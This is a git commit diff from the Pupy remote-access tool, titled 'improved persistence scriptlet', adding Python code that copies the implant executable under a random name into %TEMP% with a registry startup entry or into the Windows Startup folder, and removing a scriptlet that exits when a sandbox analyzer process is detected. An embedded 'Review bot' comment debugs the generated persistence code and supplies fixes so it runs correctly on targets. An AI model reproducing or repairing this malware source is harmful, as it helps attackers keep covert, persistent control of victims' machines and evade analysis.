improved persistence scriptlet

This commit is contained in:
n1nj4sec 2016-05-04 01:05:18 +02:00
parent 63881d8ddc
commit ce784a9469
5 changed files with 40 additions and 41 deletions

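--- a/.gitignore
+++ b/.gitignore
@@ -37,6 +37,7 @@ pupy/modules/*.py[cod]
 pupy/modules/lib/*.py[cod]
 pupy/modules/lib/**/*.py[cod]
 pupy/network/**/*.pyc
+pupy/scriptlets/**/*.pyc
 # do not ignore package & templates files
 !pupy/packages/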


@ -1,18 +0,0 @@
#!/usr/bin/env python
# -*- coding: UTF8 -*-
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
import subprocess
import re
try:
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP
info.wShowWindow = subprocess.SW_HIDE
res=subprocess.Popen(["wmic.exe", "process" ,"get", "/FORMAT:LIST"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=info)
if re.search("CommandLine\\s*=\\s*C:\\\\Python27\\\\pythonw.exe\\s+C:\\\\[a-zA-Z0-9]+\\\\analyzer.py",res):
exit()
except Exception:
pass


@ -0,0 +1,39 @@
#!/usr/bin/env python
# -*- coding: UTF8 -*-
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
import textwrap, random, string
from scriptlets import *
class ScriptletGenerator(Scriptlet):
""" copy the current pupy executable to a random exe in %TEMP% and add persistency through registry """
dependencies=[("windows/all/pupwinutils/persistence.py","pupwinutils.persistence")]
arguments={
'method': 'available methods: registry, startup'
}
def __init__(self, method="registry"):
if not method in ("registry", "startup"):
raise ScriptletArgumentError("unknown persistence method %s"%method)
self.method=method
def generate(self):
name=''.join(random.choice(string.ascii_lowercase) for _ in range(0,7))+".exe"
if self.method=="registry":
return textwrap.dedent("""
import sys, shutil, os.path
if sys.platform=="win32":
import pupwinutils.persistence
path=os.path.join(os.path.expandvars("%TEMP%"), {})
shutil.copy(sys.executable, path)
pupwinutils.persistence.add_registry_startup(path)
""".format(name))
else:
return textwrap.dedent("""
import sys, shutil, os.path
if sys.platform=="win32":
shutil.copy(sys.executable, os.path.expandvars("%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\{}"))
""".format(name))
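Review bot: The registry branch's `path=` line interpolates the random file name unquoted — `{}` with `name` equal to e.g. `abcdefg.exe` emits `os.path.join(os.path.expandvars("%TEMP%"), abcdefg.exe)`, which raises NameError when the generated code runs on the target, whereas the removed version computed `name` inside the generated code and so never hit this. Emit it as a string literal instead: `path=os.path.join(os.path.expandvars("%TEMP%"), {!r})`. The startup branch has a related escaping problem: the `\\` sequences in the generator's non-raw triple-quoted string reach the generated source as single backslashes, so a name starting with `n`, `t`, `r`, `a`, `b`, `f`, `v` or `x` is parsed as an escape sequence inside the emitted literal and silently corrupts (or fails to compile) the Startup-folder path; building it as `os.path.join(os.path.expandvars("%APPDATA%"), "Microsoft", "Windows", "Start Menu", "Programs", "Startup", {!r})` avoids both the escaping and the quoting issue. Neither branch checks whether a copy already exists, so every run of the scriptlet drops another randomly named executable, and the class docstring still describes only the `%TEMP%`/registry method although `startup` was added — worth documenting both.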


@ -1,23 +0,0 @@
#!/usr/bin/env python
# -*- coding: UTF8 -*-
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
import textwrap, random
from scriptlets import *
class ScriptletGenerator(Scriptlet):
""" copy the current pupy executable to a random exe in %TEMP% and add persistency through registry """
dependencies=[("windows/all/pupwinutils/persistence.py","pupwinutils.persistence")]
def generate(self):
return textwrap.dedent("""
import sys, shutil, os.path, random, string
if sys.platform=="win32":
import pupwinutils.persistence
random.seed({})
name=''.join(random.choice(string.ascii_lowercase) for _ in range(0,7))+".exe"
path=os.path.join(os.path.expandvars("%TEMP%"), name)
shutil.copy(sys.executable, path)
pupwinutils.persistence.add_registry_startup(path)
""".format(int(random.getrandbits(32))))